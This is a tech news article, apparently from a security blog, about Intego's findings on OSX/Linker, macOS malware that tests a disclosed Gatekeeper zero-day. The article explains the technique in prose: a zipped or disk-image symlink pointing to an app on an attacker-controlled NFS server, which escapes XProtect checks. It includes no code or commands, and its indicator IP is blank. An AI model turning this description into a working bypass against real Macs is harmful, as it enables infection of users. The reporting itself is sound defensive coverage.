OSX/Linker: New zero-day malware targets Mac devices

According to an analysis from researchers at Intego, there is a new malware that Mac users have to contend with. Dubbed “OSX/Linker” by Intego researchers, the malware seeks to attack a zero-day involving macOS’ Gatekeeper protection. The zero-day, disclosed by Filippo Cavallarin on May 24, was reported to Apple but after they failed to fix the flaw — which they said they would do in 90 days — the researcher publicly disclosed it on his blog.

With this in mind, Intego describes in the following article excerpt the logistics of OSX/Linker and the danger it poses to Mac users:

By creating a symbolic link (or “symlink” —similar to an alias) to an app hosted on an attacker-controlled Network File System (NFS) server, and then creating a .zip archive containing that symlink and getting a victim to download it, the app would not be checked by Apple’s rudimentary XProtect bad-download blocker... Although Cavallarin’s vulnerability disclosure specifies a .zip compressed archive, the samples analyzed by Intego were actually disk image files. It seems that malware makers were experimenting to see whether Cavallarin’s vulnerability would work with disk images, too... By the time the disk images had been discovered and analyzed, the NFS server was no longer hosting the Mac app referenced by the disk images’ symlinks... It is possible that these disk images, or subsequent disk images, may have been used in small-scale or targeted attacks, but so far this remains unknown.

As this further proves, the myth that Mac is safer than PC is patently false. While there is no evidence yet of a broad-scale attack with OSX/Linker, it is clear that the developers behind the malware are constantly testing it and seeing how it can leverage the Gatekeeper zero-day. Intego researchers warn that there is a possibility that Mac users have been infected and should use their VirusBarrier Scanner, which identifies the presence of OSX/Linker in their machine.

There is no real way for home users to identify infection besides this, but Intego states that sys admins can check if machines connected via NFS ports to the IP address “,” which is a possible indication of infection. Connections between the dates of May 24 and June 18 should be considered high priority.

Featured image: Shutterstock

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.

Published by
Derek Kortepeter

Recent Posts

Deploy Windows from the cloud to on-premises hardware? Yes, you can

Wouldn’t it be nice if you could deploy Windows from the cloud while sipping an…

2 days ago

Blackbaud data breach after ransomware attack hits universities, nonprofits

Blackbaud, a cloud services provider focused on the education sector and nonprofits, suffered a data…

2 days ago

Sending email from Linux terminal: Efficient and powerful solution

Knowing how to send email from the Linux command line is important, especially when you…

3 days ago

Family Tree Maker genealogy software experiences data breach

A data breach affecting popular genealogy software Family Tree Maker has been discovered and patched,…

3 days ago

Review: Microsoft 365 monitoring solution GSX Gizmo

In a world of distributed employees, GSX Gizmo provides monitoring of Microsoft 365 and on-premises…

3 days ago

Nmap: All about this free open-source network monitoring tool

Nmap is a free open-source tool used to scan networks, identify vulnerabilities, find open ports,…

4 days ago